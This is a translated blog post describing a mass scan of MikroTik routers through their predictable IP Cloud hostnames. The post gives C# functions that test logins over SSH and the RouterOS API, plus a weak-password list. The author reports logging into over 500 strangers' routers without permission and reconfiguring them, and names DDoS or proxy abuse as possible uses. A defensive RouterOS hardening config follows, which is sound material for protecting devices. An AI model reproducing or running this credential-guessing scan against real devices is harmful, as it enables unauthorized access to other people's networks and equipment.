Some pitfalls of IP Cloud technology in Mikrotik routers

Mikrotik makes good routers, and fairly recently they gained an "IP Cloud" feature. Among other things, it gives the router a subdomain that is tied to the device even when the user's router has no permanent IP address. Whether or not it has one doesn't matter for us; what matters is that the resulting name is not arbitrary but has the form serial number + .sn.mynetname.net.

Since the name is not arbitrary, and it is not that hard to find or generate ranges of serial numbers, one can ping such names and, where the address turns out to be active, try to connect.

To test this idea, a program with very simple functionality was written: it generated a name of the form SN.sn.mynetname.net and pinged it. If the result was positive, the address was remembered and the process continued.

The program then tried to connect to the addresses it had found with the username admin and the following passwords: 123456, password, 12345678, qwerty, abc123, 123456789, 111111, 1234567, iloveyou, adobe123, 123123, admin, 1234567890, letmein, photoshop, 1234, monkey, shadom, sunshine, 12345, password1, princess, azerty, trusno1, 000000, mikrotik, sysadmin (the password list was taken from the article habrahabr.ru/post/215457, and I added a couple of my own).

The connection was attempted over SSH and over the Mikrotik API, and if it succeeded, the matching password was added to the table.

Here are the functions the program used to try to connect to the routers. Both return the password that worked, or an empty string if the login failed:

```csharp
using Renci.SshNet;   // SSH.NET library: ConnectionInfo, PasswordConnectionInfo, SshClient
// MK is the MikroTik API client class from the C# example on the MikroTik wiki (linked at the end)

// Try to log in over SSH (port 22) as "admin" with the given password.
// A successful Connect() means the credentials were accepted.
private string MikrotikSSHConnect(string MikrotikIP, string MikrotikPassword)
{
    ConnectionInfo sLogin = new PasswordConnectionInfo(MikrotikIP, 22, "admin", MikrotikPassword);
    SshClient sClient = new SshClient(sLogin);
    try
    {
        sClient.Connect();
        sClient.Disconnect();
        return MikrotikPassword;
    }
    catch
    {
        // Any failure (refused connection, timeout, authentication error) counts as "no match"
        return "";
    }
}

// The same check over the MikroTik API service.
private string MikrotikAPIConnect(string MikrotikIP, string MikrotikPassword)
{
    MK mikrotik = new MK(MikrotikIP);
    try
    {
        if (mikrotik.Login("admin", MikrotikPassword))
        {
            return MikrotikPassword;
        }
    }
    catch { }   // connection or protocol errors are treated the same as a failed login
    return "";
}
```


The results of the three-day scan were as follows: two million names were generated and pinged. Of these, only 6715 answered pings with IP Cloud enabled. Of those, 97 could be logged into with no password at all, and 430 with a password from the list (which proves once again that dictionary and weak passwords should not be used).

On all the routers I managed to log into, the settings were slightly changed: ping from the outside was removed, access to the router was restricted to the local network only, and brute-force protection was added. The password could have been changed too, but who knows who handles the setup there, and I didn't want to complicate the admins' work much.
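The changes described above, written out as a RouterOS configuration that the owner of such a router could apply. This is an added example and not the author's script; the WAN interface name ether1, the LAN subnet 192.168.88.0/24, the SSH port 22 and the account name netadmin are assumptions and must be adjusted to the actual device:

```routeros
# Added example: hardening a RouterOS device against the scan described in the article.
# Assumed: WAN on ether1, LAN is 192.168.88.0/24, management only from the LAN.

# 1. Turn off the IP Cloud DDNS name if it is not actually needed, so the router
#    is no longer reachable under the predictable SN.sn.mynetname.net name.
/ip cloud set ddns-enabled=no

# 2. Bind the management services to the LAN subnet and disable the ones not in use.
/ip service
set ssh address=192.168.88.0/24
set winbox address=192.168.88.0/24
set api address=192.168.88.0/24
disable telnet,ftp,www,api-ssl

# 3. Input chain: keep existing sessions, stop answering ping from the WAN.
/ip firewall filter
add chain=input connection-state=established,related action=accept comment="keep existing sessions"
add chain=input in-interface=ether1 protocol=icmp action=drop comment="no ping from WAN"

# 4. SSH brute-force protection (the well-known staged address-list recipe):
#    a source that opens a new SSH connection four times within a minute is
#    blacklisted for 10 days. The add-src-to-address-list actions are
#    non-terminating, so a counted packet still falls through to the rules below.
add chain=input protocol=tcp dst-port=22 src-address-list=ssh_blacklist action=drop comment="drop ssh brute forcers"
add chain=input protocol=tcp dst-port=22 connection-state=new src-address-list=ssh_stage3 action=add-src-to-address-list address-list=ssh_blacklist address-list-timeout=10d
add chain=input protocol=tcp dst-port=22 connection-state=new src-address-list=ssh_stage2 action=add-src-to-address-list address-list=ssh_stage3 address-list-timeout=1m
add chain=input protocol=tcp dst-port=22 connection-state=new src-address-list=ssh_stage1 action=add-src-to-address-list address-list=ssh_stage2 address-list-timeout=1m
add chain=input protocol=tcp dst-port=22 connection-state=new action=add-src-to-address-list address-list=ssh_stage1 address-list-timeout=1m

# 5. Everything else addressed to the router itself from the WAN is dropped,
#    which also covers SSH, WinBox and API attempts from outside.
add chain=input in-interface=ether1 action=drop comment="drop all other WAN input"

# 6. Replace the default "admin" account with a named one that has a real password.
/user add name=netadmin group=full password="<strong password here>"
/user disable admin
```

Step 6 goes beyond what the author did on the routers he reached, but it removes the very combination the scan relied on: a well-known username with an empty or dictionary password. Check with `/ip firewall address-list print` after a while to see which sources have landed in ssh_blacklist.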

PS: Where the serial numbers came from:

For each number, 20 thousand serial numbers before it and the same number after it were taken.

PS2: What is so bad about this? What if it hadn't been my research just for lulz? RouterOS is a fairly capable system, and it is possible to configure such access points automatically for DDoS or to turn them into proxies for someone's dirty work :)

PS3: Yes, the connection could have been tested directly over SSH and the API, but ping was significantly faster, and that wasn't the point. I am also aware of parallelization, but in no hurry :)

PS4: A few links to the material used:
Using the Mikrotik API in C #
IP Cloud in Mikrotik routers

Source: https://habr.com/ru/post/253291/